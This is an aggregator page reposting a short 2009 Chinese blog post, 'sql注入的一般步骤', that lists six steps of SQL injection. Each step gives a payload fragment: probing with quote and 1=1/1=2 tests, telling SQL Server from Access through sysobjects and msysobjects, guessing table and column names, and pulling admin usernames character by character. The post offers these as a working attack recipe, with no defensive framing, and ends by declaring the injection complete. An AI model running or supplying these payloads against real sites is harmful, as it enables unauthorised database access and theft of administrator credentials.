惯性聚合 高效追踪和阅读你感兴趣的博客、新闻、科技资讯
阅读原文 在惯性聚合中打开

推荐订阅源

U
Unit 42
Google DeepMind News
Google DeepMind News
Stack Overflow Blog
Stack Overflow Blog
H
Help Net Security
MongoDB | Blog
MongoDB | Blog
I
InfoQ
N
Netflix TechBlog - Medium
T
Tailwind CSS Blog
量子位
博客园 - 叶小钗
月光博客
月光博客
IT之家
IT之家
G
Google Developers Blog
钛媒体:引领未来商业与生活新知
钛媒体:引领未来商业与生活新知
小众软件
小众软件
S
SegmentFault 最新的问题
Engineering at Meta
Engineering at Meta
奇客Solidot–传递最新科技情报
奇客Solidot–传递最新科技情报
aimingoo的专栏
aimingoo的专栏
云风的 BLOG
云风的 BLOG
Vercel News
Vercel News
爱范儿
爱范儿
让小产品的独立变现更简单 - ezindie.com
让小产品的独立变现更简单 - ezindie.com
宝玉的分享
宝玉的分享

博客园 - 张天利

换窝了! 性能监视器 SQL Server下如何对数据库的存储过程进行单元测试 LoadRunner9.5Cracker DataBuilder CookieReader URLResponseTime小工具 warning MSB4126(自动构建过程中网站发布不了) TFS端口列表 双色球自动选号工具 QQ开聊工具 SQLServer2005数据库同步过程 TFS2008命令行注释 查看源代码文件每一行进行更改的用户与时间信息 TFS2008从试用版升级到正式版方法 TF30170解决源代码管理文件夹的名称重复问题-解决方法2 TF30170解决源代码管理文件夹的名称重复问题 LoadRunner-ANSI C 脚本的常规 API 函数(其中包括所有协议,但 Java、VB 和 GUI 除外) 禁止TFS2008客户端自动登录TFS2008服务器.
sql注入的一般步骤
张天利 · 2009-10-20 · via 博客园 - 张天利

Posted on 2009-10-20 09:35  张天利  阅读(619)  评论(0)    收藏  举报

1、判断是否存在注入的可能。 ',and user>0, and 1=1,and 1=2.
2、判断数据库类型。and (select count(*) from sysobjects)>0 (sqlserver),
     and (select count(*) from msysobjects)>0 (Access).
3、猜解数据表。 and (select count(*) from user)>0.
4、猜解列名。 and (select count(username) from admins)>0.
5、猜解第一条记录的长度。and (select top 1 len(username) from admins)>0.
6、猜解字符。 and (select top 1 asc(mid(username,1,1)) from admins)>0.
至此注入完成。